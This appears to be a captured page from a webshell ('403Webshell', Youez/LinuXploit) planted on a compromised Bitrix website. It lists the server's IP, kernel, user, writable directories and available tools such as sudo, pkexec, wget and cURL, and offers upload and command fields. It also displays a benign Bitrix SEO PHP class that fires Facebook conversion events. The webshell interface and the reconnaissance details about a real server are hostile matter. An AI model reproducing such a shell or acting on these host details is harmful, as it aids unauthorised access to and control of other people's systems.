403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/ilovecveti.ru/bitrix/modules/seo/lib/businesssuite/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/bitrix/ext_www/ilovecveti.ru/bitrix/modules/seo/lib/businesssuite/conversion.php
<?php

namespace Bitrix\Seo\BusinessSuite;

use Bitrix\Main\Config;
use Bitrix\Seo\Retargeting;
use Bitrix\Seo\Conversion\Facebook\Event;
use Bitrix\Seo\BusinessSuite\Configuration\Facebook;
use Bitrix\Seo\Conversion\ConversionEventInterface;

abstract class Conversion extends AbstractBase
{
	/**
	 * @param array $events
	 *
	 * @return array
	 */
	protected function getData(array $events) : array
	{
		return array_filter(array_map(
			function($item) {
				return $item instanceof Event && $item->validate()? $item->prepareData() : null;
			},
			$events
		));
	}

	/**
	 * @param ConversionEventInterface[] $events
	 *
	 * @return Retargeting\Response
	 * @throws \Bitrix\Main\SystemException
	 */
	public function fireEvents(array $events) : ?Retargeting\Response
	{
		$facade = ExtensionFacade::getInstance();
		if($facade->isInstalled() && !empty($events = $this->getData($events)))
		{

			return $this->getRequest()->send([
				'methodName' => $this->getMethodName('conversion.event.fire'),
				'parameters' => array_filter([
					'fbe_external_business_id' => $facade->getCurrentSetup()->get(Facebook\Setup::BUSINESS_ID),
					'business_manager_id' => $facade->getCurrentInstalls()->getBusinessManager(),
					'pixel_id' => $facade->getCurrentInstalls()->getPixel(),
					'test_code' => Config\Option::get('seo', 'facebook_conversion_test_code', null),
					'events' => $events
				])
			]);
		}

		return null;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit